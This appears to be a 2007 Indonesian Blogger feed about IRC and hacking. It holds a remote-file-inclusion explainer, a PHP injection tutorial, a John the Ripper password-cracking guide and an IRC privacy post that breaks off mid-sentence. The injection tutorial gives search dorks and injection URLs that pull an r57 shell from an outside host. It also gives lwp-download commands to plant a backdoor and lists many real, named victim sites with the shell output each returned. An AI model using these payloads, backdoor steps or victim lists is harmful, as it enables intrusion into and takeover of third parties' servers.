<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5833266259433587312</id><updated>2012-02-16T13:45:02.146+07:00</updated><title type='text'>Ajang IRC</title><subtitle type='html'>Ajang Share segala hal tentang Mirc</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://mircku.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>35</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-2529172843619571253</id><published>2007-09-30T02:02:00.000+07:00</published><updated>2007-09-30T02:08:37.496+07:00</updated><title type='text'>cara inject lanjutan</title><content type='html'>° PRAKATA&lt;br /&gt;——-&lt;br /&gt;&lt;br /&gt;Remote file inclusion dapat diartikan sebagai penyisipan sebuah file&lt;br /&gt;dari luar suatu file dalam sebuah webserver dengan tujuan script&lt;br /&gt;didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik&lt;br /&gt;ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan&lt;br /&gt;server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat&lt;br /&gt;menggunakan bahasa script tersebut. Target remote file inclusion&lt;br /&gt;biasanya berbentuk sebuah portal atau content management system (CMS)&lt;br /&gt;sehingga banyak sekali jumlah website yang rawan terhadap serangan&lt;br /&gt;tipe ini.&lt;br /&gt;&lt;br /&gt;Dalam artikel ini kita akan lebih banyak membahas bagaimana proses&lt;br /&gt;file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi')&lt;br /&gt;bisa terjadi dalam bahasa PHP.&lt;br /&gt;&lt;br /&gt;° BAGAIMANA BISA TERJADI?&lt;br /&gt;———————–&lt;br /&gt;&lt;br /&gt;Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau&lt;br /&gt;ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.&lt;br /&gt;Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara&lt;br /&gt;benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri&lt;br /&gt;dari:&lt;br /&gt;&lt;br /&gt;1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)&lt;br /&gt;&lt;br /&gt;Variabel dalam PHP mempunyai sintaks:&lt;br /&gt;&lt;br /&gt;#1 include ($namavariable. "/file…")&lt;br /&gt;#2 require_once ($namavariable. /file…)&lt;br /&gt;#3 include_once ($variable. /file…)&lt;br /&gt;&lt;br /&gt;Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya&lt;br /&gt;terdapat variabel seperti ini:&lt;br /&gt;&lt;br /&gt;…&lt;br /&gt;include($my_ms["root"].'/error.php');&lt;br /&gt;…&lt;br /&gt;&lt;br /&gt;Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar&lt;br /&gt;webserver dengan eksploit script injeksi PHP:&lt;br /&gt;&lt;br /&gt;http://www.target.com/[Script&lt;br /&gt;Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?&lt;br /&gt;&lt;br /&gt;Diatas adalah contoh eksploitasi MySpeach &lt; = v3.0.2 (my_ms[root])&lt;br /&gt;&lt;br /&gt;2. Setting dalam file PHP.ini&lt;br /&gt;&lt;br /&gt;#1. register_globals=On&lt;br /&gt;#2. magic_quotes=off&lt;br /&gt;#3. allow_fopenurl=on&lt;br /&gt;&lt;br /&gt;° BERBAHAYAKAH?&lt;br /&gt;-------------&lt;br /&gt;&lt;br /&gt;File inclusion memiliki level resiko tinggi (High Risk) bahkan level&lt;br /&gt;sangat berbahaya (Very Dangerous) karena injeksi memperkenankan&lt;br /&gt;pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote&lt;br /&gt;Commands Execution) terhadap server. Tindakan ini sangat membahayakan&lt;br /&gt;bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses&lt;br /&gt;lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa&lt;br /&gt;saja pelaku mendapatkan akses administrator atau root.&lt;br /&gt;&lt;br /&gt;Secara garis besar resiko serangan ini adalah:&lt;br /&gt;&lt;br /&gt;1. Web root folder / subdirectory defacing.&lt;br /&gt;2. Previledge escalation (mendapatkan hak akses lebih tinggi).&lt;br /&gt;3. Menjalankan proses dalam server (psyBNC, bots, dsb)&lt;br /&gt;4. Pilfering a.k.a pencurian data (such as credentials information,&lt;br /&gt;credit cards, etc..)&lt;br /&gt;5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan&lt;br /&gt;ddos!&lt;br /&gt;&lt;br /&gt;° SISTEM OPERASI APA YANG KEBAL?&lt;br /&gt;------------------------------&lt;br /&gt;&lt;br /&gt;Saya teringat permainan C&amp;C Generals (my fave game!) saat seorang&lt;br /&gt;hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!".&lt;br /&gt;Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi&lt;br /&gt;selama mereka menggunakan server side scripting yang dapat&lt;br /&gt;dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,&lt;br /&gt;FreeBSD, Solaris, Darwin OS, dan lain-lainnya.&lt;br /&gt;&lt;br /&gt;° APA YANG HARUS DILAKUKAN?&lt;br /&gt;-------------------------&lt;br /&gt;&lt;br /&gt;Banyak sekali portal dan komunitas white hat yang sering merilis bugs&lt;br /&gt;terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan&lt;br /&gt;perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit&lt;br /&gt;perbaikan yang berarti terhadap CMS yang mungkin sekarang anda&lt;br /&gt;gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan&lt;br /&gt;hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET&lt;br /&gt;/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,&lt;br /&gt;karena bisa saja ini serangan terhadap web atau portal yang anda kelola.&lt;br /&gt;&lt;br /&gt;Salah satu tehnik paling aman bagi seorang administrator adalah selalu&lt;br /&gt;memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.&lt;br /&gt;Gunakan firewall guna mencegah penyusupan orang-orang yang tidak&lt;br /&gt;bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.&lt;br /&gt;&lt;br /&gt;° ENDING&lt;br /&gt;------&lt;br /&gt;&lt;br /&gt;Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika&lt;br /&gt;terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi&lt;br /&gt;saya lewat email. Pengalaman adalah guru yang terbaik untuk kita&lt;br /&gt;semua. Semua bisa saja terjadi karena tidak ada pribadi yang&lt;br /&gt;diciptakan sempurna. Nobody is perfect! No systems is safe!&lt;br /&gt;&lt;br /&gt;° REFERENSI&lt;br /&gt;---------&lt;br /&gt;&lt;br /&gt;- http://net-square.com/papers/one_way/one_way.html (Very simple&lt;br /&gt;haxing guides)&lt;br /&gt;- www.milw0rm.com (Nice place to looking for exploits and buggy things)&lt;br /&gt;- http://www.packetstormsecurity.org (Great advisory, toolz, and&lt;br /&gt;exploits archives)&lt;br /&gt;- www.google.com (Greatest place to ask! )&lt;br /&gt;- http://www.ultrapasswords.com/ (Place to cooling down... We love&lt;br /&gt;streaming vids! Yeah!)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-2529172843619571253?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2529172843619571253'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2529172843619571253'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/cara-inject-lanjutan.html' title='cara inject lanjutan'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-5167104391473091979</id><published>2007-09-30T01:34:00.000+07:00</published><updated>2007-09-30T01:44:17.175+07:00</updated><title type='text'>[Tutorial] PHP injection! [+contoh SHELL]</title><content type='html'>Hello World!&lt;br /&gt;&lt;br /&gt;mungkin tutorial ini rada basi sih.. cma /me cma mo share azah!&lt;br /&gt;anak2 demohacking pasti da pada tau..&lt;br /&gt;&lt;br /&gt;PHP injection...&lt;br /&gt;&lt;br /&gt;pertama2 kita buka google.com&lt;br /&gt;&lt;br /&gt;kita memasuk kan keyword nya di sana...&lt;br /&gt;&lt;br /&gt;keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di&lt;br /&gt;millw0rm.com cari sendiri yg laen]&lt;br /&gt;&lt;br /&gt;Kita mulai saja!&lt;br /&gt;&lt;br /&gt;sources/lostpw.php?FORM[set]=1&amp;FORM[session_id]=1&amp;CONFIG[path]=&lt;br /&gt;allinurl%3Aindex.php%3Fa%3Ddisplay&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;allinurl:index.php?a=display&lt;br /&gt;&lt;br /&gt;allinurl &lt;=- mencari setiap kata pada url...&lt;br /&gt;&lt;br /&gt;index.php?a=display&lt;br /&gt;&lt;br /&gt;sources/lostpw.php?FORM[set]=1&amp;FORM[session_id]=1&amp;CONFIG[path]=&lt;br /&gt;&lt;br /&gt;http://www.historywebsites.com//index.php?a=display &lt;=- tampil pada&lt;br /&gt;google..&lt;br /&gt;&lt;br /&gt;http://www.historywebsites.com// &lt;=- victim domain&lt;br /&gt;&lt;br /&gt;index.php?a=display &lt;=- DORK... kata kunci pada google...&lt;br /&gt;&lt;br /&gt;http://www.historywebsites.com/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;injektor nya ada di link..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;http://www.geocities.com/yogya_hack/becak.tar.gz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;http://evilarmy.hostcentric.com/becak.tar.gz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;itu adalah r57&lt;br /&gt;&lt;br /&gt;hmm....&lt;br /&gt;kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...&lt;br /&gt;cara nya ..&lt;br /&gt;&lt;br /&gt;lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia&lt;br /&gt;&lt;br /&gt;jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx&lt;br /&gt;&lt;br /&gt;find . -type d -perm 777&lt;br /&gt;&lt;br /&gt;cari dari direktori skr sebuah direktori lain yang bisa di tlis...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;find . -type f -perm 777 &lt;=- mencari file&lt;br /&gt;&lt;br /&gt;find / -type d -perm 777 &lt;=- mencari dari direktori / (root)&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Backdoor PHP&lt;br /&gt;&lt;br /&gt;1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz&lt;br /&gt;2. mv becak.tar.gz door.php&lt;br /&gt;&lt;br /&gt;Contoh Hasil Site backdoor:&lt;br /&gt;&lt;br /&gt;http://www.target.com/[path]/door.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;okeh...&lt;br /&gt;sekian dl..&lt;br /&gt;sector clear!!&lt;br /&gt;&lt;br /&gt;Thanks Goes To:&lt;br /&gt;ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]&lt;br /&gt;^MoNgOnDoW^ [Big thanks for lending the room!]&lt;br /&gt;YF Xcode Big Famz! [thanks for support!]&lt;br /&gt;^F_C^ [you know me!]&lt;br /&gt;and all crewz!&lt;br /&gt;#Becak &amp; B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ini ada beberapa contoh shell nya...&lt;br /&gt;semoga masih berjalan!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;&lt;br /&gt;http://www.historywebsites.com/topsites/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? uid=48(apache) gid=48(apache) groups=48(apache),&lt;br /&gt;2522(psaserv)&lt;br /&gt;&lt;br /&gt;http://www.steroidsource.net/sources/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? uid=32211(wantflir) gid=32211(wantflir)&lt;br /&gt;groups=32211(wantflir)&lt;br /&gt;&lt;br /&gt;http://dreamweaver.net.ru/ex/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz?&lt;br /&gt;&lt;br /&gt;http://www.trsaga.com/top/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)&lt;br /&gt;&lt;br /&gt;http://www.clubbangaz.net/tpl/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? user=banga uid=1476 gid=812&lt;br /&gt;&lt;br /&gt;http://www.gameserverlist.de/toplist/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? user=web5 uid=670 gid=104&lt;br /&gt;&lt;br /&gt;http://www.r.kmdn.ru/sources/lostpw.php?FORM[set]=1&amp;FORM[session_id]&lt;br /&gt;=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?&lt;br /&gt;user=kmdn-r uid=2422 gid=1754&lt;br /&gt;&lt;br /&gt;http://www.bullterrier.kiev.ua/topsites/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)&lt;br /&gt;&lt;br /&gt;http://www.gurbetporthosting.com/GurbetPortList/sources/lostpw.php?&lt;br /&gt;FORM[set]=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.&lt;br /&gt;hostcentric.com/becak.tar.gz? user= uid= gid=643 save&lt;br /&gt;&lt;br /&gt;http://a-z.az/top/sources/lostpw.php?FORM[set]=1&amp;FORM[session_id]&lt;br /&gt;=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?&lt;br /&gt;user=a3544_1 uid=10130 gid=2524&lt;br /&gt;&lt;br /&gt;http://vietcong.ath.cx/xampp/www/ucu/bannerlist//sources/lostpw.php?&lt;br /&gt;FORM[set]=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.&lt;br /&gt;hostcentric.com/becak.tar.gz? SYSTEM win&lt;br /&gt;&lt;br /&gt;http://www.cityofgod.org/top/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody),&lt;br /&gt;511(restricted)&lt;br /&gt;&lt;br /&gt;http://top.mavit.kiev.ua/sources/lostpw.php?FORM[set]&lt;br /&gt;=1&amp;FORM[session_id]=1&amp;CONFIG[path]=http://www.evilarmy.hostcentric.&lt;br /&gt;com/becak.tar.gz?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;om admin.. jgn di pindah yah.. seharus nya ada di atas itu...&lt;br /&gt;hehehe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-5167104391473091979?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mircku.blogspot.com/feeds/5167104391473091979/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5833266259433587312&amp;postID=5167104391473091979' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5167104391473091979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/5167104391473091979'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/tutorial-php-injection-contoh-shell.html' title='[Tutorial] PHP injection! [+contoh SHELL]'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-2184583088858745778</id><published>2007-09-30T00:32:00.000+07:00</published><updated>2007-09-30T00:42:31.585+07:00</updated><title type='text'>Tutorial John The Ripper (JTR)</title><content type='html'>Pengenalan&lt;br /&gt;----------&lt;br /&gt;John the Ripper merupakan password cracker yang cepat. JTR tersedia &lt;br /&gt;pada berbagai &lt;br /&gt;platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi &lt;br /&gt;kelemakan &lt;br /&gt;password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win &lt;br /&gt;NT/2000/XP &lt;br /&gt;yang berbentuk LM hashes.&lt;br /&gt;&lt;br /&gt;Bagi yang belum mempunyai JTR, anda dapat download disini:&lt;br /&gt;- http://www.openwall.com/john/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ada beberapa hal penting pada JTR &lt;br /&gt;[passfile] - Nama dari password file anda&lt;br /&gt;[wordlist] - Kumpulan kata-kata&lt;br /&gt;[output] - Hasi decrypt password&lt;br /&gt;[session name] - Nama yang anda gunakan untuk menyimpan session&lt;br /&gt;&lt;br /&gt;-- contoh Pasword File: passwd.txt --&lt;br /&gt;root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash&lt;br /&gt;user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash&lt;br /&gt;lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash&lt;br /&gt;-- contoh Pasword File: passwd.txt --&lt;br /&gt;&lt;br /&gt;Note: Simpan [passfile] di folder yang sama dengan file execute JTR&lt;br /&gt;      Hal ini untuk mempermudah penggunaan JTR :)&lt;br /&gt;&lt;br /&gt;Terdapat 3 mode pada JTR untuk mendecrypt password&lt;br /&gt;1. Single Mode&lt;br /&gt;   Pada Single Mode, JTR akan berusaha mencari Password yang paling&lt;br /&gt;   lemah dari seluruh password. Cara ini merupakan cara yang paling&lt;br /&gt;   cepat.&lt;br /&gt;&lt;br /&gt;   Syntax single mode&lt;br /&gt;   - john -single [passfile]&lt;br /&gt;     atau&lt;br /&gt;   - john -si [passfile]&lt;br /&gt;  &lt;br /&gt;   Co: Anda mempunyai password file passwd.txt&lt;br /&gt;       Maka penggunaannya : john -si passwd.txt&lt;br /&gt;   &lt;br /&gt;2. Wordfile Mode&lt;br /&gt;   Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan&lt;br /&gt;   kamus kata-kata. &lt;br /&gt;&lt;br /&gt;   Wordfile syntax&lt;br /&gt;   john -wordfile:[wordlist] [passfile] &lt;br /&gt;   atau &lt;br /&gt;   john -w:[wordlist] [passfile] &lt;br /&gt;&lt;br /&gt;   Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst&lt;br /&gt;   john -w:words.lst passwd.txt&lt;br /&gt;&lt;br /&gt;3. Incremental Mode&lt;br /&gt;   Incremental Mode merupakan cara yang paling lambat dan berusaha untuk &lt;br /&gt;   mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,&lt;br /&gt;   bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan &lt;br /&gt;   cara ini apabila 2 cara sebelumnya gagal.&lt;br /&gt;   Terdapat 4 perintah dasar dalam penggunaannya&lt;br /&gt;   a. digits: Akan mencoba mendecrypt semua password dengan karakter angka&lt;br /&gt;   b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf&lt;br /&gt;   c. all: Akan mencoba mendecrypt semua password dengan semua karakter &lt;br /&gt;           termasuk karakter spesial, co: @!^&amp;?&lt;br /&gt;   d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara&lt;br /&gt;&lt;br /&gt;   Syntax:&lt;br /&gt;   john -i [passfile] &lt;br /&gt;   john -i:DIGITS [passfile] &lt;br /&gt;   john -i:ALPHA [passfile] &lt;br /&gt;   john -i:ALL [passfile] &lt;br /&gt;&lt;br /&gt;   Co: Anda mempunyai password file passwd.txt&lt;br /&gt;   john -i passwd.txt&lt;br /&gt;   john -i:DIGITS passwd.txt&lt;br /&gt;   john -i:ALPHA passwd.txt&lt;br /&gt;   john -i:ALL passwd.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mode lainnya pada JTR&lt;br /&gt;- Show Mode &lt;br /&gt;  Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya&lt;br /&gt;  pada file tertentu.&lt;br /&gt;&lt;br /&gt;  Syntax:   &lt;br /&gt;  john -show [passfile]&gt;[output]&lt;br /&gt;&lt;br /&gt;  Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt&lt;br /&gt;  john -show passwd.txt&gt;hasil.txt&lt;br /&gt;&lt;br /&gt;  Anda juga dapat melihat langsung hasil decrypt dari JTR.&lt;br /&gt;&lt;br /&gt;  Syntax:&lt;br /&gt;  john -show [passfile]&lt;br /&gt;&lt;br /&gt;  Hasilnya terlihat seperti berikut: &lt;br /&gt;&lt;br /&gt;  root:root:0:0:root:/root:/bin/bash&lt;br /&gt;  user:company:515:100:user:/home/user:/bin/bash&lt;br /&gt;  lin:rootme:515:100:lin:/home/lin:/bin/bash&lt;br /&gt;  3 passwords cracked, 0 left&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Menghentikan JTR&lt;br /&gt;  Untuk menghentikan JTR anda dapat menekan CTRL+C&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Rules&lt;br /&gt;  Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba&lt;br /&gt;  kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR&lt;br /&gt;  akan mencoba variasi dari kata2 pada wordlist.&lt;br /&gt;&lt;br /&gt;  Syntax&lt;br /&gt;  john w:[wordlist] -rules [passfile] &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Session &amp; Restore&lt;br /&gt;  Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan&lt;br /&gt;  JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan &lt;br /&gt;  syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke &lt;br /&gt;  session terakhir.&lt;br /&gt;  &lt;br /&gt;  Syntax&lt;br /&gt;  john -restore &lt;br /&gt;  john -restore:[session name] &lt;br /&gt;  john -session:[session name] &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila&lt;br /&gt;  anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang&lt;br /&gt;  tombol", JTR akan menampilkan status terakhir.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Semua password yang pernah di crack disimpan JTR di john.pot&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Anda bisa mendapatkan Wordfile di site-site berikut:&lt;br /&gt;1. http://www.openwall.com/passwords/wordlists/&lt;br /&gt;&lt;br /&gt;2. http://www.sparkleware.com/lists.html&lt;br /&gt;&lt;br /&gt;3. http://ftp.cerias.purdue.edu/pub/dict/local/&lt;br /&gt;&lt;br /&gt;4. ftp://sable.ox.ac.uk/pub/wordlists/&lt;br /&gt;&lt;br /&gt;5. http://www.theargon.com/archives/wordlists/theargonlists/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Referensi AKA Bacaan: &lt;br /&gt;1. Dokumentasi JTR&lt;br /&gt;2. http://www.openwall.com/john/&lt;br /&gt;&lt;br /&gt;3. http://securitysite.host.sk/jtr.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-2184583088858745778?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2184583088858745778'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/2184583088858745778'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/tutorial-john-ripper-jtr.html' title='Tutorial John The Ripper (JTR)'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-431564688556248093</id><published>2007-09-30T00:01:00.000+07:00</published><updated>2007-09-30T00:03:33.940+07:00</updated><title type='text'>Tips dan triks IRC (Special)</title><content type='html'>Tips dan triks IRC ini sangat populer di kalangan chatter karena tips dan triks ini berisi cara melindungi identitas diri kita dari para chatter lainnya sekaligus juga dapat untuk mengetahui keberadaan teman chatting kita, memata-matai dia, melihat isi chattingan dia sampai meremote mIRC teman chatting kita tersebut.&lt;br /&gt;&lt;br /&gt;Tips di IRC&lt;br /&gt;Nih tips untuk para chatter IRC, mau tahu ?&lt;br /&gt;Pertama-tama..&lt;br /&gt;Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :&lt;br /&gt;&lt;br /&gt;1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis&lt;br /&gt;&lt;br /&gt;2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini.&lt;br /&gt;&lt;br /&gt;3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.&lt;br /&gt;&lt;br /&gt;4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)&lt;br /&gt;&lt;br /&gt;Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.&lt;br /&gt;Efek jika tidak menuruti tips diatas maka efeknya adalah :&lt;br /&gt;&lt;br /&gt;1. jika "user id" tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri&lt;br /&gt;&lt;br /&gt;2. Jika pada logging bukan "none" maka bersiap-siaplah isi chattingan anda dilihat orang ketiga&lt;br /&gt;&lt;br /&gt;3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).&lt;br /&gt;&lt;br /&gt;Penulis :&lt;br /&gt;Yogya Family Code&lt;br /&gt;&lt;br /&gt;*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)&lt;br /&gt;&lt;br /&gt;Tips tambahan di IRC&lt;br /&gt;Tips tambahan khusus para chatter yang ingin menyembunyikan diri&lt;br /&gt;&lt;br /&gt;Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?&lt;br /&gt;&lt;br /&gt;1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika 